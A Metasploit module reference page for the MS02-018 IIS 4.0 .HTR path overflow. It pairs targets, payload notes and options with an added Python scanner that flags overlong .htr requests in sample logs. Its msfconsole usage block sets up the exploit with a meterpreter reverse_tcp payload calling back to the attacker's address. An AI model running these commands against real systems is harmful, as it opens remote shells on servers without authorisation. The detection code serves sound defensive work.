Microsoft IIS 4.0 .HTR Path Overflow
This module exploits a buffer overflow in the ISAPI extension ISM.DLL, which processes HTR scripting in IIS 4.0. It works against Windows NT 4 Service Packs 3, 4, and 5. The server continues to process requests until the executed payload exits. If EXITFUNC is set to 'seh', the server keeps processing requests, but terminating a bind shell will be difficult. If EXITFUNC is set to 'thread', the server crashes when the bind shell exits. The payload is alphanumerically encoded and sent without a NOP sled, because the request filters would otherwise mangle the data.
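Since the vulnerable code path is only reached through a request for a .htr resource, a defender reviewing IIS logs can look for .htr requests at all (the mapping is rarely needed, and removing the .htr script mapping so ISM.DLL is never invoked is the standard mitigation) and for .htr requests whose path is far longer than any real script name. The following is an added example written for this page, not code from the Metasploit module or from Rapid7; it assumes W3C extended log lines with the fields date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status, and the 256-byte length threshold is an assumption chosen for illustration. The log lines are constructed.

```python
import re

# Assumption: any legitimate .htr script name is well under this length.
LONG_PATH_THRESHOLD = 256

HTR_RE = re.compile(r"\.htr$", re.IGNORECASE)

# Constructed sample log in W3C extended format (fields listed in the header line).
SAMPLE_LOG = (
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "1999-06-08 10:01:02 192.0.2.10 GET /default.htm - 200\n"
    "1999-06-08 10:01:05 192.0.2.10 GET /scripts/changepw.htr - 200\n"
    "1999-06-08 10:01:09 192.0.2.77 GET /" + "A" * 600 + ".htr - 500\n"
)


def parse_w3c_line(line):
    """Split one W3C extended log line into a dict; return None for directives/short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 6:
        return None
    return {
        "date": parts[0],
        "time": parts[1],
        "client": parts[2],
        "method": parts[3],
        "uri": parts[4],
        "query": parts[5],
        "status": parts[6] if len(parts) > 6 else None,
    }


def classify_request(uri):
    """Return None for non-.htr paths, 'htr-request' for ordinary .htr paths,
    and 'suspicious-long-htr' when the .htr path length exceeds the threshold."""
    if not HTR_RE.search(uri):
        return None
    if len(uri) >= LONG_PATH_THRESHOLD:
        return "suspicious-long-htr"
    return "htr-request"


def scan_log(text):
    """Scan log text and return (client, verdict, uri_length) for every .htr request."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        verdict = classify_request(rec["uri"])
        if verdict is not None:
            findings.append((rec["client"], verdict, len(rec["uri"])))
    return findings


if __name__ == "__main__":
    for client, verdict, length in scan_log(SAMPLE_LOG):
        print(f"{client}: {verdict} (uri length {length})")
```

Ordinary .htr hits are reported too, so that an administrator who has removed the .htr mapping can confirm nothing still depends on it; only the overlong request is marked suspicious.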
Exploit Rank
- Good
Exploit Authors
- stinko < vinnie [at] metasploit.com >
Vulnerability References
- CVE-1999-0874
- OSVDB-3325
- BID-307
- http://www.eeye.com/html/research/advisories/AD19990608.html
- MSB-MS02-018
Exploit Targets
- 0 - Windows NT 4.0 SP3 (default)
- 1 - Windows NT 4.0 SP4
- 2 - Windows NT 4.0 SP5
Exploit Development
Similar Exploit Modules
- exploit/windows/iis/iis_webdav_upload_asp
- exploit/windows/iis/ms01_023_printer
- exploit/windows/iis/ms01_026_dbldecode
- exploit/windows/iis/ms01_033_idq
- exploit/windows/iis/ms03_007_ntdll_webdav
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/iis/ms02_018_htr
msf exploit(ms02_018_htr) > show payloads
msf exploit(ms02_018_htr) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms02_018_htr) > set LHOST [MY IP ADDRESS]
msf exploit(ms02_018_htr) > set RHOST [TARGET IP]
msf exploit(ms02_018_htr) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| RHOST | The target address |
| RPORT | The target port (default: 80) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
